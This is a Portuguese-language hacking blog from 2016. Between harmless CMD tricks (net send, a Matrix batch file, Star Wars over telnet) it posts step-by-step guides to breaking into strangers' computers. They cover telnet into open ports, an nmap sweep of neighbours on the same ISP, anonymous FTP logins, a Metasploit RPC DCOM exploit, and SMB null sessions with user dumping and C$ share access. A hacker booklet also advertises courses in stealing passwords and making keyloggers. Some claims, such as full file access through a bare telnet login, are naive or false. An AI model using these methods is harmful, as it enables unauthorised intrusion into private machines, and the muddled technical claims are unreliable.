sexta-feira, 8 de julho de 2016

MANEIRA FÁCIL DE INVADIR UM COMPUTADOR

1)  Prepare o endereço IP da vítima. (por exemplo: 101.23.53.70) 

2)  o download e instalar  Advanced Port Scanner .


3)  Abrir Avançada  Port Scanner  e Digite o  endereço IP  na coluna direita e clique em  Scan.

cortar pc, cortar com ip
4)  ele vai listas que todas as portas abertas do PC da vítima ou Router. (por exemplo: porto 91)
5)  Depois de recuperar o endereço IP e as portas abertas da vítima, Open  Prompt de Comando  (CMD)
e Tipo:  telnet [endereço IP] [PORT]
por exemplo:  telnet  101.23.53.70   91
6)  Agora você será solicitado a inserir informações de login, Basta digitar usuário e senha e pressione Enter.
Se nenhuma senha é utilizada apenas digitar o nome de usuário. 


Pronto!  Agora você terá acesso a todos os arquivos da vítima e Documentos, navegando com CMD (use cd, copiar, excluir mv ... fazer todos os truques.)

segunda-feira, 27 de junho de 2016

COMO ENVIAR MENSAGENS PELO PROMPT DE COMANDO!!!! 2016

COMO ENVIAR MENSAGENS PELO PRONT DE COMANDO:


PARA ENVIAR MENSAGENS PELO CMD, É PRECISO ESTAR CONECTADO NA MESMA REDE LOCAL ENTRE OS COMPUTADORES:
  1. VÁ NO SEU MENU INICIAL E DIGITA CMD
  2. APÓS ABRIR, DIGITA "NET VIEW"
  3. VAI APARECER A LISTA DE NOMES DE COMPUTADORES QUE ESTÃO EM SUA REDE.  COPIE O NOME DO PC DE SUA PREFERÊNCIA
  4. DIGITE: PING (IP DA PESSOA) -4
  5. VAI DISPARAR O IP QUE VOCÊ ESCOLHEU
  6. APÓS TER O IP, VAMOS A MENSAGEM. DIGITE "NET SEND (IP DA PESSOA) MENSAGEM QUE QUER ENVIAR"
EXECUTE A MENSAGEM COM CONHECIDO!!!

domingo, 12 de junho de 2016

COMO FAZER CHUVA DE MATRIX NO CMD! 2016


  1. ABRA O SEU CMD E DIGITA: 

@echo off
  1. color 0a
    :A
    echo 7 f s o 0 s 2 7 A c 9 2 D 4 h H o q 5 Q O P 9 s o 1 s c x s 1 l 3 d q 5 o l p a S d 2 8 a p i 3 9 8 d 2 k i p q d z 9 2 7 A d k i q p i 3 9 J 2 3 9 s d a
    ping localhost -n 1>nul
    echo i s 8 0 A X S k p q o s 8 3 8 s a q P C a 2 1 c o d i l P 0 8 4 x 8 s p a l c x z p q e d v 0 3 9 D F 3 1 f S 3 v c s a w a e v c x 2 4 f a j i k l p o 8 h
    ping localhost -n 1>nul 
    echo  o d i l P 0 8 4 x 8 s p a l c x z p q e d v o s 8 3 8 s a q P C a 2 1 c o d i l P 0 8 4 x 8 s p a l c x 3 1 f S 3 v c o d i l P 0 8 4 x 8 s p 3 1 f S 3 a j i
    ping localhost -n 1>nul A c 9 2 D 4 h H o q  1 c o d i l P 0  o d i l P 0 0 8 4 x 8 s p a l c x z p q e d 2 8 a p i 3 9 8 d  x 8 s p a l c  z 9 2 7 A d k i q p i 
    goto A
  2. SALVE COMO: MATRIX.BAT
  3. PRONTO! AGORA ENTRE! AGORA VAI CAIR CHUVA DE MATRIX!!!
MUITO MASSA, APROVEITEM!!!

COMO ASSISTIR STAR WARS PELO CMD! 2016



  1. PARA ASSISTIR STAR WARS PELO CMD SIGA O TUTORIAL ABRA O SEU CMD E INSTALE O TELNET! PARA INSTALAR DIGITA NO CMD: /iu:"TelnetClient!
  2. SAIA DO CMD DIGITANDO: EXIT!
  3. AGORA ABRA NOVAMENTE O SEU CMD E DIGITE: TELNET   
  4. DEPOIS DIGITE SOMENTE  "o"  SEM ASPAS!
  5. DEPOIS DIGITE towel.blinkenlights.nl !!!
PRONTO DIVIRTA-SE! O VIDEO COMEÇARÁ A RODAR!!!

COMO SER UM HACKER INICIANTE! 2016

Índice:


     Introdução .......................................................................................... 3 
    Segurança ........................................................................................... 4
    Oque é ser um Hacker? ..................................................................... 6
       Oque eu tenho que fazer para ser um Hacker? ................................. 7
       O que é um vírus de computador? ..................................................... 8
    Protocolos TCP/IP o que são? ........................................................... 9
    Dicionário Hacker .............................................................................. 1
        Produtos Exclusivos Mundo Dos Hackers ......................................... 12
      Conclusão ........................................................................................... 13 

    1.  Essa apostila é de autoria da equipe ○☼Mundo Dos Hackers☼○, todo conteúdo,escrito na mesma é de responsabilidade nossa. Essa apostila não poderá ser distribuída por pessoas que não estão autorizadas. Essa apostila tem como finalidade passar uma noção básica, sobre segurança,protocolo TCP/IP e noções hacker básica. Durante sua leitura você poderá compreender e se interessar na área Hacker. Ser um hacker não significa ser um ladrão, mas sim ter um amplo conhecimento na área de informática segurança,software e hardware. Todos os hackers seja ele qual for, famoso ou não, começou debaixo para chegar até onde ele chegou, afinal ninguém nasce sabendo, então por que você não pode chegar a ser um hacker de verdade? Todos nos temos chance, o que fará de uma pessoa um hacker é se interessar no assunto, obviamente, ter paciência,correr atrás de conteúdos para estudo e saber que você nunca mais nunca mesmo irá se tornar um hacker da noite para o dia. Se você esta lendo essa apostila já é um bom sinal, demonstra que você tem sede de conhecimento, mas o que não pode é você parar só nessa apostila. Como tudo na vida tem os seus requisitos, os requisitos para se ter um bom proveito desta apostila é: 3.51 de paciência, memória de 512, HD de pelo menos 80Giga cerebral e gravador de conteúdo. Bem falando seriamente, a equipe do ○☼Mundo Dos Hackers☼○, deseja a você uma boa leitura e ótimos estudos. www.mundodoshackers.x-br.com                                                                                                                                                               Segurança:
    2. Segurança Antes de se mexer com programas como: trojans, keyloggers, cracks, etc. É preciso estar acima de tudo protegido contra possíveis ameaças, pois hoje é você o invasor mas amanhã pode ser você o invadido. Quantas vezes você já baixou algum crack oualgum programa hacker, em um site que você não conhece? Na maioria das vezes esses programas e cracks que você baixa pode estar infectado com algum trojan oukeylogger. Por isso é de suma importância estar bem protegido antes de mexer com qualquer programa hacker, a não ser que você queira ter seu profile no Orkut roubado,acho que não né. Hoje em dia os seguintes programas são necessários estar instalados em seu PC,para você estar 98% protegido: Um bom Antivírus, um Anti-Spyware, um Antiadware e um Firewall. Isso tudo não é exagero, tanto que você vai ficar apenas 98%protegido. Cada um dos programas acima vai te proteger de uma ação suspeita ou de uma ação de vírus diferente, o antivírus tem como principal finalidade te proteger dos famosos Cavalos de Troia (Trojans), Worms , Vermes, entre outros; o AntiSpywaretem como principal finalidade te proteger de vírus espiões como: keyloggers; o Antiadware tem como principal finalidade te proteger de spywares, malwares e outros; e ofirewall tem como principal finalidade de fechar as portas vulneráveis de seu PC e dete alertar de possíveis ataques. Se não for possível ter todos esses programas em seu PC, é necessário ter pelo menos o antivírus e o antispyware. Mas não pense que com todos esses programas você estará totalmente protegido, pois estar totalmente protegido é totalmente impossível nos dias de hoje, a varias e varias formas de se camuflar um cliente de um trojan ou keylogger de maneira que ele não seja detectado por alguns antivírus, más também não é para você ficar paranoico é claro. A mais eficiente forma de você evitar possíveis infecções no seu PC, é saber bem o que esta baixando, e assim que baixado o programa, escanear o mesmo com seu antivírus, para saber se não tem algum vírus embutido. Lembrando que quando você for mexer com trojans, você desative o seu antivírus, porque se não ele vai apagar o trojan, e nem sempre o que o antivírus detecta é vírus como o ardamax keylogger, antivírus detecta ele como um cavalo de tróia, mas na verdade ele não é, o anti vírus só te alerta porque o programa ardamax tem como finalidade criar um keylogger para você receber tudo que a vitima digita, no seu e-mail, por tanto pode ficar tranquilo encertas ocasiões, e pode criar seus vírus em paz. www.mundodoshackers.x-br.com                                                                                                                        
    3. Em questão de segurança, é de suma importância tomar cuidado com outras coisas que não te ataque diretamente como as famosas paginas fakes, paginas fakes são paginas que simulam ser um site importante como o Orkut, Hotmail e até sites de bancos, más não passam de farsas, contem o campo de login, ou seja você vai digitar seu user name e senha, e logo em seguida o seus dados é guardado em um banco dedados da pagina fake (na maioria das vezes em PHP), depois disso você redirecionado para a pagina inicial do site em que você achava que estava, essas paginas são hospedadas em serviços de hospedagem gratuitos, ou ate mesmo em serviços de hospedagem pagos. Uma das maneiras de se saber quando um site é falso é analisar extensão do site, exemplo: www.orkut.com (verdadeiro) www.orkut.rg3.com.br(falso), mas nem sempre a extensão será tão diferente assim, quando o site hospedado em hospedeiro pago, o site pode ficar mais comum como : www.orkut.net(falso) ou www.orkut.com.br (falso). Mas se por um acaso um dia você cair em uma dessas armadilhas, é cabível trocar sua senha imediatamente. www.mundodoshackers.x-br.com  
    O que é ser um hacker ?
    1. Quando se fala em hackers, qual a primeira coisa que vem em sua cabeça? Espero que sua resposta seja uma pessoal com vasto conhecimento na área de informática e profissional na área de segurança, software e hardware, e não um ladrão que rouba senhas de banco, e pirateia softwares. Essa parte cabe aos Crackers. Um individuo hacker é uma pessoa que tem muito conhecimento em informática, em segurança, em software e hardware, um hacker passa sua maior parte do tempo no computador, pesquisando assuntos relacionados a informática, e também explorando brechas (vulnerabilidades), em servidores e sites, mas não para invadi-los e sim para ajudar o administrador a cobrir essa falha, sempre seguindo a ética hacker. Ser um hacker é saber que pode invadir um certo servidor mas resistir a tentação e ajudar o pobre do administrador (isso se a tentação não for muito forte! To brincando). Um hacker não tem medo de espalhar seu conhecimento, e nem de ser superado, pois quanto maior a superação, maior é a vontade de superar. Um hacker tem sede desconhecimento e esta sempre atrás de novidades, pois tem consciência de que nunca se sabe tudo. A vários hackers famosos, que construirão suas historias no mundo virtual,e as lançarão no mundo real através de livros, um dos hackers mais famosos é o KevinDavid Mitnick, o hacker mais famoso do mundo, atualmente é um hacker bem sucedido e trabalha na área de segurança na Internet, e já tem dois livros lançados,tudo bem que nem toda sua vida foi desse jeito, mas ele se redimiu, e merece todo seu sucesso. O caminho que você vai seguir, se será o do hacker ou o do cracker cabe a você decidir, mas saiba logo de cara que todos nos só aprendemos errando. Ética hacker: a ética hacker é aplicada em comunidades virtuais , um de seus criadores foi o finlandês Pekka Himanen. Nos tempos de hoje a ética hacker é basicamente resumida em dois critérios: 1- Acreditar que o compartilhamento de informações é positivo, e por isso os hackers compartilham suas experiências e programam software livre, facilitando o acesso à informação e os recursos disponíveis para computadores sempre que possível.2- Acreditar que penetrar em sistemas por diversão e exploração é eticamente aceitável , desde que não cometa roubo, vandalismo ou quebre a confidencialidade.(Esse princípio não é unânime, alguns consideram a simples invasão uma ação não ética.). www.mundodoshackers.x-br.com        O que eu tenho que fazer para ser um Hacker ? 
    2. A maioria das pessoas dizem que o primeiro passo para ser um hacker é estudar e aprimorar programação C++, eu já não acredito que seja obrigatório saber programação, nos tempos de hoje já se tem um grande número de programas que te ajuda a pular parte de programação em certas ocasiões, mas é claro que se deve estudar um pouco e ter pelo menos uma noção de programação, para saber lhe dar com certas ocasiões. O que é indispensável para que quiser ser um hacker é a sede de “conhecimento”, mas já que você esta lendo essa apostila exclusiva do ○☼Mundo Dos Hackers☼○, da para saber que sede de conhecimento não é problema para você. Outra coisa muito importante é saber que não é fácil chegar a ser hacker, esse é um caminho árduo e de altas e baixas, mas o que não pode acontecer nunca é você desistir, tenha o seguinte pensamento em mente: Todos hackers seja ele famoso ou não, não nasceu sabendo, todos tiveram que começar do zero, e fazer sua fama. Além disso, hoje em dia, tem varias maneiras de você obter conhecimento hacker mais rapidamente, umas delas é o curso de hacker ○☼Mundo Dos Hackers☼○. Fazendo um curso sem duvida nenhuma é a melhor forma de se ter amplo conhecimento na área hacker, pois um curso é como uma escola. A vários conteúdos hacker gratuitos na net, mas do que adianta você baixar um monte de programas e não saber usá-los, baixar um monte de tutoriais mas não ter suporte para esclarecimento de suas duvidas? Mas isso é uma decisão sua. Para ser um grande hacker um dia, você tem que ter cabeça, e tomar decisões certas nas horas certas. E nunca mais nunca mesmo sair falando para todo mundo que você é um hacker, e que sabe invadir sites, servidores e computadores dos outros, isso se for dito de forma errada ou ser interpretada de forma errada, pode não pegar bem para você. Você sendo um hacker, poderá quem sabe ser um analista de sistema ou um administrador de um servidor algum dia. Isso quem poderá dizer é você. www.mundodoshackers.x-br.com                                                                                                              O que é um vírus de computador?
    3.  Um vírus de computador é nada mais nada menos do que um programa malicioso feito por um programador, com o intuito de se obter privilégios, do computador da vítima. Os vírus mais conhecidos são os Cavalos de tróia (trojan) e os Keyloggers. O cavalo de troia é um cliente entre a vitima e você, ou seja assim queexecutado, ele irá abrir uma determinada porta do PC da vitima e ligara o seu PC como da vitima, lhe dando assim, dependendo do cavalo de troia, absoluto controle ao computador da vitima, porém os cavalos de troia mais populares como o: ProRat,Beast, CIA entre outros, já estão virando relíquia, todos os antivírus, até mesmo o mais fraco consegue detectar o Server desses cavalos de troia, a forma de evitar possíveis constrangimentos ao enviar para uma vitima, e o antivírus dele detectar, camuflar o server do cavalo de troia, essa é uma missão difícil mas não impossível,uma das formas de se fazer isso antigamente era usando um joiner, mas hoje em dia já não da mais certo, a forma mais cabível hoje em dia é modificar o código fonte do server. Mas isso é um assunto que não cabe a essa apostila. São criados por ano vários e vários vírus de computador, que no inicio chega aser indetectável, mas com o tempo deixa de ser devido as inúmeras atualizações dos antivírus, por isso a importância de manter seu antivírus sempre atualizado. Os sintomas mais frequentes de um computador infectado por um vírus são: Perda de desempenho do computador Exclusão de arquivos sem o seu consentimento Alteração de dados sem o seu consentimento Perda de desempenho da rede (local ou Internet) Desconfiguração do Sistema Operacional Se estiver desconfiado de que seu PC esteja com vírus, escaneia o mesmo com seu antivírus o mais rápido possível, antes que você tenha danos maiores. www.mundodoshackers.x-br.com                                                                   Protocolos TCP/IP o que são?                                                
    4. O modelo TCP/IP - como muitos outros modelos de protocolos - pode ser visto como um grupo de camadas, em que cada uma resolve um grupo de problemas da transmissão de dados, fornecendo um serviço bem definido para os protocolos da camada superior. Estas camadas mais altas estão logicamente mais perto do usuário(camada de aplicação), lidam com dados mais abstratos e confiam nos protocolos das camadas mais baixas para traduzir dados em um formato que pode eventualmente ser transmitido fisicamente. Os protocolos para internet formam o grupo de protocolos de comunicação que implementam a pilha de protocolos sobre a qual a internet e a maioria das redes comerciais funciona. Eles são algumas vezes chamados de "protocolos TCP/IP", jáque os dois protocolos mais importantes desse modelo são: o protocolo TCP -Transmission Control Protocol (Protocolo de Controle de Transmissão) - e o IP -Internet Protocol (Protocolo Internet). Esses dois protocolos foram os primeiros a serem definidos.O modelo OSI descreve um grupo fixo de sete camadas que alguns fornecedores preferem e que pode ser comparado a grosso modo com o modelo TCP/IP. Essa comparação pode causar confusão ou trazer detalhes mais internos para o TCP/IP. Dicionário Hacker:                                                              
    5. Essas palavras abaixo são as mais usadas no mundo da informática Hacker, cada uma adelas tem um significado e caminho diferente a ser percorrido.White hat - (aka hacker ético) hacker em segurança, utiliza os seus conhecimentos na exploração e detecção de erros de concepção, dentro da lei. A atitude típica de um white hat assim que encontra falhas de segurança é a de entrar em contato com os responsáveis pelo sistema, comunicando do fato. Geralmente, hackers de chapéu branco violam seus próprios sistemas ou sistemas de um cliente que o empregou especificamente para auditar a segurança. Pesquisadores acadêmicos e consultores profissionais de segurança são dois exemplos de hackers de chapéu branco.Gray hat - Tem as habilidades e intenções de um hacker de chapéu branco na maioria dos casos, mas por vezes utiliza seu conhecimento para propósitos menos nobres. Um hacker de chapéu cinza pode ser descrito como um hacker de chapéu branco que às vezes veste um chapéu preto para cumprir sua própria agenda. Hackers de chapéu cinza tipicamente se enquadram em outro tipo de ética, que diz ser aceitável penetrarem sistemas desde que o hacker não cometa roubo, vandalismo ou infrinja confidencialidade. Alguns argumentam, no entanto, que o ato de penetrar em um sistema por si só já é anti-ético (ética hacker).Black hat - (aka cracker ou dark-side hacker) criminoso ou malicioso hacker, um cracker. Em geral, crackers são menos focados em programação e no lado acadêmico de violar sistemas. Eles comumente confiam em programas de cracking e exploram vulnerabilidades conhecidas em sistemas para descobrir informações importantes para ganho pessoal ou para danificar a rede ou sistema alvo.Script kiddie - Antigamente chamado de Lammer, é um indivíduo que não tem domínio dos conhecimentos de programação. É pouco experiente, com poucas noções de informática, porém tenta fazer-se passar por um cracker a fim de obter fama, o que acaba gerando antipatia por parte dos hackers verdadeiros. Cerca de 95% dos ataques virtuais são praticados por script kiddies. www.mundodoshackers.x-br.com.
    6. Newbie - Newbie, Noob ou a sigla NB, é aquele jovem aprendiz de hacker que possuiuma sede de conhecimento incrivel, pergunta muito e é ignorado e ridicularizado maioria das vezes, ao contrario dos lammers não tenta se pôr acima dos outros,geralmente é muito simples e possui uma personalidade ainda fraca.Phreaker - hacker especialista em telefonia móvel ou fixa. www.mundodoshackers.x-br.com                                                                       Produtos exclusivos Mundo Dos Hackers:
    7. A equipe Mundo Dos Hackers disponibiliza, vários conteúdos hacker para estudo um deles é o Curso de Hacker, além de pacotes hacker, camisetas hacker, pacote estudo, pacote interativo, curso de formatação e revista mundo dos hackers underground. Todos esses produtos são de exclusividade nossa, para quem ta começando é recomendável fazer o nosso curso de hacker, pois no curso você terá noções básicas, e ao decorrer do curso você conseguira ir alem do básico e aprenderá passo a passo como pegar senhas, invadir computadores domésticos, invadir sites e até invadir servidores, a maneira que você vai utilizar o que aprendeu no curso, cabe a você decidir, mas deixando claro que o curso tem como finalidade capacitar e formar pessoas para a área hacker, na parte de segurança. No curso será explicado tudo claramente sem complicação, e você poderá tirar suas duvidas por MSN e/ou E-mail. Alem das aulas você receberá conteúdos para estudo que incluem: programas utilizados nas aulas, programas hackers, vídeo aulas, arquivos de áudio MP3 explicando cada aula, e outros brindes. Os pacotes hackers servem para ajudar você com uma coletânea de mais de 150 programas hackers + programas diversos + apostilas + tutoriais + vídeo aulas + 1 semana de suporte por MSN, isso tudo vai em um super CD, via carta registrada. Tanto os cursos e os pacotes, só serão pagos depois que você tiver recebido o mesmo em sua casa, isso é para você ter certeza de que irá receber o produto que pediu. O pagamento é feito via deposito bancário. O produto devera ser pago em no Màximo 3 dias úteis após o recebimento do mesmo. As camisetas hackers, são de exclusividade do Mundo Dos Hackers, elas são de tecido de primeira, pretas com o nome do Mundo Dos Hackers na frente, estão disponíveis camisetas femininas e masculinas. O pagamento da camiseta será feito também depois que você recebê-la em sua casa. E por ultimo a Revista digital Mundo Dos Hackers Underground, essa revista é a versão paga da nossa revista, a versão gratuita esta disponível para download em nosso site: www.mundodoshackers.x-br.com . A revista Mundo Dos Hackers Underground é bimestral e trás informações quentes da área hacker e informática, além de arquivos de áudio MP3 lendo a revista para você, para quem tem preguiça de ler é só ouvir, e mais programas hackers e programas domésticos, isso tudo em um CD que será entregue em sua casa via carta registrada, e o pagamento da revista também será feito só depois que você tiver recebido a revista em sua casa. A revista MundoDos Hackers gratuita, também é bimestral e trás noticias quentes da área hacker e daárea de informática software e hardware, porem não tem o arquivo em MP3, como eu já disse em cima ela esta disponível para downloads em nosso site. As duas revistas contam com um design moderno e digital, vale apena conferir. Nossa lista de produtos completa pode ser vista no seguinte link: www.mundodoshackers.x-br.com/produtospag.htm www.mundodoshackers.x-br.com 
    8. Conclusão
    9. Esperamos que esta apostila tenha te dado um conhecimento básico sobre o queé ser um hacker, e esperamos também que ela te de mais sede de conhecimento, e que você não pare nessa apostila, e sim passe a procurar mais conteúdo para estudo hacker.Uma coisa muito importante, que é bom deixar registrado é que conhecimento não é crime! O verdadeiro crime é ter conhecimento e não poder usá-lo.Esses são os links relacionados ao Mundo Dos Hackers:Site: www.mundodoshackers.x-br.comComunidade no orkut: http://www.orkut.com/Community.aspx?cmm=34107839Fórum: http://forum.mundodoshackers.x-br.com/ www.mundodoshackers.x-br.com 

    SATÉLITE ONLINE HACKEADO INÉDITO VEJA!!! 2016

    CLIQUE NO NOS LINKS ROXOS PARA VER:
     1-"http://iss.stormway.ru/ru/" VIDA REAL A OLHO NÚ NOS EUA!

    2-http://www.n2yo.com/   VIDA REAL MAPEADO DO GOOGLE MAPS!
    3-http://www.satflare.com/track.asp?q=22490#TOPDO BRASIL. PARA VER NA VIDA REAL ARRASTE O HOMINHO AMARELO QUE ESTA LOGO ABAIXO DO LADO DIREITO!


    4-http://www.cidade-brasil.com.br/vistasatelite-venha-ver.html APENAS MOSTRA O MAPA EM GPS,IMAGEM FIXA DE 2016,TAMBEM DA PARA VER PESSOAS!











    quinta-feira, 9 de junho de 2016

    COMO INVADIR COMPUTADORES! 2016

    PARA HACKEAR UM PC É BEM SIMPLES, AVISO:"MUITOS HACKERS É BURROS AO ENSINAREM,POR ISSO VOU REVELAR UM SEGREDO QUE ELES NUNCAM FALAM OK! PARA INVADIR UM PC É IMPORTANTE SABER SE A PORTAS ESTÃO ABERTAS!!!

    1. DESCUBRA O IP  DA VÍTIMA! ABRA O SEU PROMPT DE COMANDO!
    2. DIGITE O COMANDO "NET VIEW"!
    3. APARECERA A LISTA DE NOMES DE COMPUTADORES. AGORA DIGITE: "PING (NOME DO PC) -4" OBS: SEM ASPAS E SEM PARENTESES!
    4. VAI DISPARAR O IP. AGORA COPIA ESSE IP!
    5. VÁ NO SEU MENU INICIAR E DIGITA: SERVICES.MSC!
    6. VAI ABRIR A PROPRIEDADE DE SERVIÇOS, PROCURE POR "AÇÃO"!
    7. DEPOIS CLIQUE EM "CONECTAR A OUTRO COMPUTADOR"!
    8. COLOCA O IP QUE TINHA-MOS COPIADO ANTERIORMENTE E COLA NA BARRA!
    9. AGORA VAI APARECER UMA TELA PRETA AO LADO COM O COMPUTADOR DA VÍTIMA. SE O COMPUTADOR DELA ESTIVER SENHA DE ADMISTRADOR TENTE HACKEAR, FAZENDO OUTRO MÉTODO,NO MEU BLOG ESTA EXPLICANDO DE "COMO HACKEAR WINDOWS"! 
    10. CASO AO CONTRARIO SE NÃO ESTIVER SENHA APROVEITE! VOCÊ TERÁ ACESSO TOTAL AO COMPUTADOR DA VÍTIMA!
    2 etapa 2

    Invasao pelas portas 21,23,135,445


    Estou fazendo esse tutorial aqui, porque me pediram para postar aqui. Mais eu odeio esse tipo de ataque, pois esse tipo de ataque não satisfaz as nossas necessidades. UMA PERGUNTA: porque pessoas gostam de ficar invadindo computadores aleatoriamente sem saber donde é aquele computador, sem saber de nada?
    Eu mesmo respondo. Essas pessoas que fazem isso são lammers que saem tentando invadir tudo quanter sistema para si gabar para seus amigos. AIAAIAIAI
    Um conselho para todos vocês que sabem invadir ou estão aprendendo: VOCE NÃO PRECISA FALAR PARA NINGUEM QUE VOCE SABE INVADIR, POIS QUANDO SURGIR A NECESSIDADE, VOCE SURPREENDERÁ OUTRAS PESSOAS!
    Um tutorial bem simples e obsoleto que é ainda muito usado nos dias de hoje (por lammers).
    Invasão pelas portas:
    21: FTP
    23: TELNET
    135: RPC
    445: COMPARTILHAMENTO
    Estes ataques precisam ter pessoas do mesmo provedor que você.
    Vamos começar:
    Pegue o seu ip externo(sugestão: www.meuip.com.br).
    Baixe o nmap e instale no seu pc.
    Vamos supor que o seu ip seja: 201.33.22.18.
    Entre no prompt comando do Windows e digite nmap. Aparecerá um montão de opções e ajudas para você aprende a utilizar.
    Prosseguindo…
    Iremos fazer scanner de portas nos computadores da sua redondeza que tem o mesmo provedor que você.
    digite:
    nmap -sV -T Insane -A -v  201.33.22.1-254 -p21,23,135,44
    Pronto vai listar todas as portas abertas de todos os usuários da sua banda larga ou do seu bairro, estado etc depende da sua banda.
    Código:
    Discovered open port 21/tcp on 201.33.22.223
    Discovered open port 23/tcp on 201.33.22.1
    Discovered open port 23/tcp on 201.33.22.186
    Discovered open port 445/tcp on 201.33.22.14
    Discovered open port 445/tcp on 201.33.22.97
    Discovered open port 445/tcp on 201.33.22.24
    Discovered open port 445/tcp on 201.33.22.152
    Discovered open port 445/tcp on 201.33.22.149
    Discovered open port 445/tcp on 201.33.22.81
    Discovered open port 445/tcp on 201.33.22.69
    Discovered open port 445/tcp on 201.33.22.9
    Discovered open port 445/tcp on 201.33.22.55
    Discovered open port 445/tcp on 201.33.22.113
    Discovered open port 445/tcp on 201.33.22.218
    Discovered open port 445/tcp on 201.33.22.21
    Discovered open port 445/tcp on 201.33.22.107
    Discovered open port 445/tcp on 201.33.22.111
    Discovered open port 445/tcp on 201.33.22.56
    Discovered open port 445/tcp on 201.33.22.178
    Discovered open port 445/tcp on 201.33.22.191
    Discovered open port 445/tcp on 201.33.22.157
    Discovered open port 445/tcp on 201.33.22.127
    Discovered open port 445/tcp on 201.33.22.29
    Discovered open port 445/tcp on 201.33.22.207
    Discovered open port 135/tcp on 201.33.22.175
    Discovered open port 135/tcp on 201.33.22.164
    Invasao pela porta 21
    vamos lá… ira aparecer um tanto de computadores que tem a porta 21 aberta. Todos aqueles que tiverem a mesma aberta. Voce pode tentar logar como anonymous, pois alguns administradores ou pessoas nao si preocupam em retirar o usuario anonymous do ftp.
    Iniciar>Executar>cmd>ftp>open>201.33.22.223>anonymous>a
    Invasao pela porta 23
    Iniciar>Executar>cmd>telnet>open>201.33.22  23
    Invasao pela porta 135
    CASO a porta 135 aberta, podemos usar o METASPLOIT
    abra o metasploit na interface web. procure pelo exploit MICROSOFT RPC.
    depois disso escolha o tipo de conexao como: GERENIC\SHELL_BLIND_TCP ou voce que sabe o tipo de conexao a ser usada.
    depois disso matenha as informaçoes padroes do metasploit só inclua o ip da vitima, pois so o Windows dele nao for atualizado, ele ja vem como shell. Essa invasão rpc dcom já ficou obsoleta também.
    Invasao pela porta 445
    Esta porta é de compartilhamento.
    Iniciar>Executar>cmd>net use \\201.45.241.175\ipc$ “” /u:””
    Comando concluído com êxito.
    baixa o Dumpusers
    ponha ele no C:\
    abra o cmd digite;
    dumpusers -target 201.45.241.175 -type notdc -start 1 -stop 900 -mode verbose
    depois você vai no:
    iniciar>executar>\\201.45.241.175\c$
    Gente esse tipo de invasão é uma das mais ridículas. Aconcelho a nao fazerem isso.


    CONHECIMENTO NÃO É CRIME, NÃO ME RESPONSABILIZO PELO USO DE CONHECIMENTO AQUI CITADO!!!